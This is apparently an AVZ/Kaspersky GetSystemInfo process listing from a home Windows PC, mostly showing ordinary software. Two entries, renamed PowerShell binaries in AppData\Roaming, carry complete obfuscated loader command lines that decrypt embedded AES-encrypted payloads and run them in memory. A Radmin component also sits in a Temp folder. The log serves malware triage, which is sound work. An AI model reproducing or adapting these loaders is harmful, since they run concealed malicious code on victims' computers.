Results of system analysis

Process List

File name	PID	Description	Copyright	MD5	Information
c:\program files (x86)\gigabyte\appcenter\apcent.exe Script: Quarantine, Delete, Delete via BC, Terminate	13820	ApCent	Copyright © 2015	A4483DD133DBB74B8DF11C11A2C68E63	2404.88 kb, rsAh,created: 10.05.2022 13:46:08,modified: 10.05.2022 13:46:08 Command line: "C:\Program Files (x86)\GIGABYTE\AppCenter\ApCent.exe"
c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe Script: Quarantine, Delete, Delete via BC, Terminate	6140	MobileDeviceService	© 2022 Apple Inc. All rights reserved.	6A9C1ADD1BCDD4B0805284914DD0BB6B	100.84 kb, rsAh,created: 08.10.2022 03:00:46,modified: 08.10.2022 03:00:46 Command line:
c:\users\isaac\appdata\local\temp\5d3l4qk2.wbn\getsysteminfodllcache\avz\avz.exe Script: Quarantine, Delete, Delete via BC, Terminate	24968			9810173F62BA5DE6F9028BC5D221814D	9084.14 kb, rsAh,created: 23.07.2023 13:29:15,modified: 21.03.2023 10:09:05 Command line: "C:\Users\Isaac\AppData\Local\Temp\5d3l4qk2.wbn\GetSystemInfoDllCache\avz\avz.exe" SpoolLog="C:\Users\Isaac\AppData\Local\Temp\5d3l4qk2.wbn\GetSystemInfo\avz.log" TempFolder="C:\Users\Isaac\AppData\Local\Temp\5d3l4qk2.wbn\GetSystemInfo\AvzTemp"
c:\program files (x86)\bookingdesktopapp\update\bookingdesktopappupdate.exe Script: Quarantine, Delete, Delete via BC, Terminate	4412	bookingDesktopApp Update	Copyright 2007-2010 Google Inc.	066C52A2E24BDE844BD8A0460368CCC4	100.00 kb, rsAh,created: 29.09.2020 19:53:40,modified: 29.09.2020 19:53:39 Command line: "C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe" /c
c:\program files (x86)\bookingdesktopapp\update\bookingdesktopappupdate.exe Script: Quarantine, Delete, Delete via BC, Terminate	23568	bookingDesktopApp Update	Copyright 2007-2010 Google Inc.	066C52A2E24BDE844BD8A0460368CCC4	100.00 kb, rsAh,created: 29.09.2020 19:53:40,modified: 29.09.2020 19:53:39 Command line: "C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe" /ua /installsource core
c:\program files (x86)\bookingdesktopapp\update\bookingdesktopappupdate.exe Script: Quarantine, Delete, Delete via BC, Terminate	25520	bookingDesktopApp Update	Copyright 2007-2010 Google Inc.	066C52A2E24BDE844BD8A0460368CCC4	100.00 kb, rsAh,created: 29.09.2020 19:53:40,modified: 29.09.2020 19:53:39 Command line: "C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe" /svc
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	14140	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	5404	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	4820	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	7696	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	22024	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	16368	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	17864	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	24756	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	4692	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	23516	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	14412	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	16252	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	10452	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	24236	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	24828	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	24832	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	5804	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	25412	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	22728	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	22324	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	16608	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	23700	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	19536	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	23420	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	11448	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	24632	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	23904	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	14840	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	4120	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	8392	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	4576	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\program files (x86)\google\chrome\application\chrome.exe Script: Quarantine, Delete, Delete via BC, Terminate	10456	Google Chrome	Copyright 2023 Google LLC. All rights reserved.	33B718A39CEC26ACD224C1531CACE4AB	3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14 Command line:
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe Script: Quarantine, Delete, Delete via BC, Terminate	1344	Discord	Copyright (c) 2023 Discord Inc. All rights reserved.	A879449582DB4B230254BD585D211E5C	133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13 Command line: "C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe" --type=renderer --user-data-dir="C:\Users\Isaac\AppData\Roaming\discord" --standard-schemes --secure-schemes=sentry-ipc --bypasscsp-schemes=sentry-ipc --cors-schemes=sentry-ipc --fetch-schemes=sentry-ipc --service-worker-schemes --streaming-schemes --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\resources\app.asar" --no-sandbox --no-zygote --autoplay-policy=no-user-gesture-required --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --time-ticks-at-unix-epoch=-1690136115256806 --launch-time-ticks=271576255 --mojo-platform-channel-handle=3624 --field-trial-handle=1472,i,3093661789889788456,14303255259992432667,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --enable-node-leakage-in-renderers /prefetch:1
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe Script: Quarantine, Delete, Delete via BC, Terminate	9696	Discord	Copyright (c) 2023 Discord Inc. All rights reserved.	A879449582DB4B230254BD585D211E5C	133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13 Command line: "C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --user-data-dir="C:\Users\Isaac\AppData\Roaming\discord" --standard-schemes --secure-schemes=sentry-ipc --bypasscsp-schemes=sentry-ipc --cors-schemes=sentry-ipc --fetch-schemes=sentry-ipc --service-worker-schemes --streaming-schemes --mojo-platform-channel-handle=3900 --field-trial-handle=1472,i,3093661789889788456,14303255259992432667,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe Script: Quarantine, Delete, Delete via BC, Terminate	20784	Discord	Copyright (c) 2023 Discord Inc. All rights reserved.	A879449582DB4B230254BD585D211E5C	133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13 Command line: "C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe"
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe Script: Quarantine, Delete, Delete via BC, Terminate	10048	Discord	Copyright (c) 2023 Discord Inc. All rights reserved.	A879449582DB4B230254BD585D211E5C	133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13 Command line: C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\Isaac\AppData\Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Isaac\AppData\Roaming\discord\Crashpad --url=https://f.a.k/e --annotation=_productName=discord --annotation=_version=1.0.9015 --annotation=plat=Win32 --annotation=prod=Electron --annotation=ver=22.3.12 --initial-client-data=0x494,0x4b8,0x4bc,0x470,0x4c0,0x8e34d78,0x8e34d88,0x8e34d94
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe Script: Quarantine, Delete, Delete via BC, Terminate	9212	Discord	Copyright (c) 2023 Discord Inc. All rights reserved.	A879449582DB4B230254BD585D211E5C	133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13 Command line: "C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Isaac\AppData\Roaming\discord" --standard-schemes --secure-schemes=sentry-ipc --bypasscsp-schemes=sentry-ipc --cors-schemes=sentry-ipc --fetch-schemes=sentry-ipc --service-worker-schemes --streaming-schemes --mojo-platform-channel-handle=1828 --field-trial-handle=1472,i,3093661789889788456,14303255259992432667,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe Script: Quarantine, Delete, Delete via BC, Terminate	19796	Discord	Copyright (c) 2023 Discord Inc. All rights reserved.	A879449582DB4B230254BD585D211E5C	133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13 Command line: "C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe" --type=gpu-process --user-data-dir="C:\Users\Isaac\AppData\Roaming\discord" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=1568 --field-trial-handle=1472,i,3093661789889788456,14303255259992432667,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
c:\program files (x86)\gigabyte\easytuneengineservice\easytuneengineservice.exe Script: Quarantine, Delete, Delete via BC, Terminate	16716	EasyTuneEngineService	Copyright © 2014 GIGA-BYTE TECHNOLOGY CO., LTD.	081B5046F149EED850D3DB8418221270	141.22 kb, rsAh,created: 05.11.2020 17:43:28,modified: 05.11.2020 17:43:28 Command line: "C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\EasyTuneEngineService.exe"
c:\program files (x86)\microsoft gameinput\x64\gameinputsvc.exe Script: Quarantine, Delete, Delete via BC, Terminate	6796	GameInput Host Service	© Microsoft Corporation. All rights reserved.	EFBB63A705D505FFBD154CC443054574	89.50 kb, rsAh,created: 26.02.2023 04:38:52,modified: 26.02.2023 04:38:52 Command line:
c:\program files (x86)\microsoft gameinput\x64\gameinputsvc.exe Script: Quarantine, Delete, Delete via BC, Terminate	5444	GameInput Host Service	© Microsoft Corporation. All rights reserved.	EFBB63A705D505FFBD154CC443054574	89.50 kb, rsAh,created: 26.02.2023 04:38:52,modified: 26.02.2023 04:38:52 Command line:
c:\program files\windowsapps\microsoft.gamingservices_10.75.13001.0_x64__8wekyb3d8bbwe\gamingservices.exe Script: Quarantine, Delete, Delete via BC, Terminate	7224	GamingServices	© Microsoft Corporation. All rights reserved.	75E50FAC4CEFB615C66DA3E946BEEAB2	73.45 kb, rsAh,created: 17.03.2023 02:07:08,modified: 17.03.2023 02:07:10 Command line:
c:\program files\windowsapps\microsoft.gamingservices_10.75.13001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe Script: Quarantine, Delete, Delete via BC, Terminate	7232	GamingServices	© Microsoft Corporation. All rights reserved.	75E50FAC4CEFB615C66DA3E946BEEAB2	73.45 kb, rsAh,created: 17.03.2023 02:07:08,modified: 17.03.2023 02:07:10 Command line:
c:\program files (x86)\gigabyte\smartsurvey\gbtcarebotservice.exe Script: Quarantine, Delete, Delete via BC, Terminate	20272	GbtCareBotService	Copyright © 2018 GIGA-BYTE TECHNOLOGY CO., LTD.	0A587E589D8E21A328169DF55006F247	134.92 kb, rsAh,created: 06.09.2018 15:53:26,modified: 06.09.2018 15:53:26 Command line: "C:\Program Files (x86)\GIGABYTE\SmartSurvey\GbtCareBotService.exe"
c:\users\isaac\appdata\roaming\gmfik.bat.exe Script: Quarantine, Delete, Delete via BC, Terminate	17660	Windows PowerShell	© Microsoft Corporation. All rights reserved.	B94110F627D2BA6C57EB84A0F9575B27	443.50 kb, rSaH,created: 23.07.2023 13:15:56,modified: 05.05.2023 07:56:03 Command line: "C:\Users\Isaac\AppData\Roaming\GmfIK.bat.exe" -w hidden -c $ArcD='CjTnAreajTnAtejTnADecjTnArjTnAypjTnAtorjTnA'.Replace('jTnA', '');$EIyG='ChajTnAngejTnAExtejTnAnsjTnAijTnAonjTnA'.Replace('jTnA', '');$ddrD='TjTnArajTnAnjTnAsjTnAforjTnAmFijTnAnjTnAajTnAlBlojTnAckjTnA'.Replace('jTnA', '');$HZKC='EntjTnArjTnAyPjTnAoinjTnAtjTnA'.Replace('jTnA', '');$fkvT='FrjTnAomBjTnAasejTnA64jTnAStjTnArijTnAngjTnA'.Replace('jTnA', '');$JDCJ='GjTnAetCjTnAurjTnArejTnAntPrjTnAocjTnAejTnAsjTnAsjTnA'.Replace('jTnA', '');$fjGk='SjTnApljTnAitjTnA'.Replace('jTnA', '');$ZJFf='LoajTnAdjTnA'.Replace('jTnA', '');$fsoP='FirsjTnAtjTnA'.Replace('jTnA', '');$GSDe='IjTnAnvjTnAokjTnAejTnA'.Replace('jTnA', '');$WyFb='MaijTnAnMojTnAdujTnAljTnAejTnA'.Replace('jTnA', '');$DKWO='ReadjTnALinjTnAesjTnA'.Replace('jTnA', '');function BrGrP($WUZkx){$aszSW=[System.Security.Cryptography.Aes]::Create();$aszSW.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aszSW.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aszSW.Key=[System.Convert]::$fkvT('Yg9lQU2I/zPr+3hXJdqcZKMekul1bK9pDFef4vEqPDI=');$aszSW.IV=[System.Convert]::$fkvT('fRifPIwAepUdWFOI5v9eiQ==');$qEOhP=$aszSW.$ArcD();$TIDXf=$qEOhP.$ddrD($WUZkx,0,$WUZkx.Length);$qEOhP.Dispose();$aszSW.Dispose();$TIDXf;}function ZhMnz($WUZkx){$TCOnO=New-Object System.IO.MemoryStream(,$WUZkx);$QqCNk=New-Object System.IO.MemoryStream;$XkOAE=New-Object System.IO.Compression.GZipStream($TCOnO,[IO.Compression.CompressionMode]::Decompress);$XkOAE.CopyTo($QqCNk);$XkOAE.Dispose();$TCOnO.Dispose();$QqCNk.Dispose();$QqCNk.ToArray();}$gfDxw=[System.Linq.Enumerable]::$fsoP([System.IO.File]::$DKWO([System.IO.Path]::$EIyG([System.Diagnostics.Process]::$JDCJ().$WyFb.FileName, $null)));$mxqkG=$gfDxw.Substring(3).$fjGk(':');$VYxVc=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[0])));$yVtIo=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[1])));[System.Reflection.Assembly]::$ZJFf([byte[]]$yVtIo).$HZKC.$GSDe($null,$null);[System.Reflection.Assembly]::$ZJFf([byte[]]$VYxVc).$HZKC.$GSDe($null,$null);
c:\users\isaac\desktop\gsi-6.2.2.43.exe Script: Quarantine, Delete, Delete via BC, Terminate	14748	Kaspersky Get System Info	© 2018 AO Kaspersky Lab. All Rights Reserved.	6DA67B5B9B64B09F23BBA29CD594E69B	13579.77 kb, rsAh,created: 23.07.2023 13:28:36,modified: 23.07.2023 13:27:24 Command line: "C:\Users\Isaac\Desktop\GSI-6.2.2.43.exe"
c:\users\isaac\appdata\local\temp\xbdo.0\gsi.exe Script: Quarantine, Delete, Delete via BC, Terminate	25572	Kaspersky Get System Info	2018 AO Kaspersky Lab. All Rights Reserved.	E75FC2CB9EE83934BCB818718898B374	1332.27 kb, rsAh,created: 23.07.2023 13:28:39,modified: 21.03.2023 10:31:36 Command line: "C:\Users\Isaac\AppData\Local\Temp\xbdo.0\GSI.exe"
c:\program files (x86)\gigabyte\cloudstation_server\homecloud\hcloud.exe Script: Quarantine, Delete, Delete via BC, Terminate	17504	HCLOUD	Copyright © Microsoft 2013	D4CB529A07F3A8E483288CF31018138C	152.29 kb, rsAh,created: 01.03.2016 13:59:14,modified: 01.03.2016 13:59:14 Command line: "C:\Program Files (x86)\Gigabyte\CloudStation_Server\HomeCloud\HCLOUD.exe"
c:\users\isaac\appdata\local\temp\fd369298e4\jweupdater.exe Script: Quarantine, Delete, Delete via BC, Terminate	19352	Radmin component	Copyright © 1999-2017 Famatech Corp. and its licensors. All rights reserved.	DFA7432F09124CF6051FBB8A0D48AD6F	833132.36 kb, rsah,created: 05.03.2023 23:23:54,modified: 05.03.2023 23:21:53 Command line: "C:\Users\Isaac\AppData\Local\Temp\fd369298e4\jweupdater.exe"
c:\users\isaac\appdata\roaming\kkgac.bat.exe Script: Quarantine, Delete, Delete via BC, Terminate	16056	Windows PowerShell	© Microsoft Corporation. All rights reserved.	FC02C8A46596C09687741EB41AC48674	411.00 kb, rSaH,created: 23.07.2023 02:12:17,modified: 07.05.2022 00:20:22 Command line: "C:\Users\Isaac\AppData\Roaming\kKGAC.bat.exe" $hoqP='MaASJPinMASJPodASJPuASJPleASJP'.Replace('ASJP', '');$icJO='LoASJPadASJP'.Replace('ASJP', '');$PTNQ='EASJPnASJPtASJPrASJPyPoASJPinASJPtASJP'.Replace('ASJP', '');$qOyZ='SASJPpliASJPtASJP'.Replace('ASJP', '');$Pdxo='CASJPrASJPeaASJPtASJPeDASJPecASJPryptASJPorASJP'.Replace('ASJP', '');$TEkt='TranASJPsfoASJPrmASJPFinaASJPlBASJPloASJPckASJP'.Replace('ASJP', '');$xFRM='FroASJPmBaASJPse6ASJP4StASJPriASJPngASJP'.Replace('ASJP', '');$cDSQ='CASJPhASJPaASJPngASJPeASJPExteASJPnsiASJPonASJP'.Replace('ASJP', '');$hMFe='FirASJPstASJP'.Replace('ASJP', '');$dBAR='GetCASJPuASJPrreASJPntASJPProASJPceASJPssASJP'.Replace('ASJP', '');$Wijw='IASJPnvASJPokASJPeASJP'.Replace('ASJP', '');$FOKd='ReASJPadASJPLASJPinASJPesASJP'.Replace('ASJP', '');function IgypD($utrtk){$NjyUn=[System.Security.Cryptography.Aes]::Create();$NjyUn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NjyUn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NjyUn.Key=[System.Convert]::$xFRM('ObPQe07WRiYWEUTOpWDEw/EZfBcGQKT9ju4qCcGJuXE=');$NjyUn.IV=[System.Convert]::$xFRM('DgAS1sFB7YAK8VQ/Y81U7Q==');$nkxgc=$NjyUn.$Pdxo();$pgtXE=$nkxgc.$TEkt($utrtk,0,$utrtk.Length);$nkxgc.Dispose();$NjyUn.Dispose();$pgtXE;}function tEuKj($utrtk){$ClWPe=New-Object System.IO.MemoryStream(,$utrtk);$JHyon=New-Object System.IO.MemoryStream;$aZrPy=New-Object System.IO.Compression.GZipStream($ClWPe,[IO.Compression.CompressionMode]::Decompress);$aZrPy.CopyTo($JHyon);$aZrPy.Dispose();$ClWPe.Dispose();$JHyon.Dispose();$JHyon.ToArray();}$pLLSf=[System.Linq.Enumerable]::$hMFe([System.IO.File]::$FOKd([System.IO.Path]::$cDSQ([System.Diagnostics.Process]::$dBAR().$hoqP.FileName, $null)));$XQVFj=$pLLSf.Substring(3).$qOyZ(':');$VsmWT=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[0])));$YKzPU=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[1])));[System.Reflection.Assembly]::$icJO([byte[]]$YKzPU).$PTNQ.$Wijw($null,$null);[System.Reflection.Assembly]::$icJO([byte[]]$VsmWT).$PTNQ.$Wijw($null,$null);
c:\program files\lghub\lghub.exe Script: Quarantine, Delete, Delete via BC, Terminate	18064	LGHUB	Copyright (c) Logitech, Inc. 2023	CEABE5A2C205F89E68E20D1F04160F0C	148462.75 kb, rsAh,created: 23.06.2023 12:22:48,modified: 23.06.2023 12:22:46 Command line:
c:\program files\lghub\lghub.exe Script: Quarantine, Delete, Delete via BC, Terminate	18132	LGHUB	Copyright (c) Logitech, Inc. 2023	CEABE5A2C205F89E68E20D1F04160F0C	148462.75 kb, rsAh,created: 23.06.2023 12:22:48,modified: 23.06.2023 12:22:46 Command line:
c:\program files\lghub\lghub.exe Script: Quarantine, Delete, Delete via BC, Terminate	19328	LGHUB	Copyright (c) Logitech, Inc. 2023	CEABE5A2C205F89E68E20D1F04160F0C	148462.75 kb, rsAh,created: 23.06.2023 12:22:48,modified: 23.06.2023 12:22:46 Command line:
c:\program files\lghub\lghub.exe Script: Quarantine, Delete, Delete via BC, Terminate	17472	LGHUB	Copyright (c) Logitech, Inc. 2023	CEABE5A2C205F89E68E20D1F04160F0C	148462.75 kb, rsAh,created: 23.06.2023 12:22:48,modified: 23.06.2023 12:22:46 Command line:
c:\program files\lghub\lghub_agent.exe Script: Quarantine, Delete, Delete via BC, Terminate	18324	LGHUB Agent	Copyright © Logitech, Inc. 2023	77CCE6601EFC8762B560A28C28F83800	46108.25 kb, rsAh,created: 23.06.2023 12:22:49,modified: 23.06.2023 12:22:46 Command line:
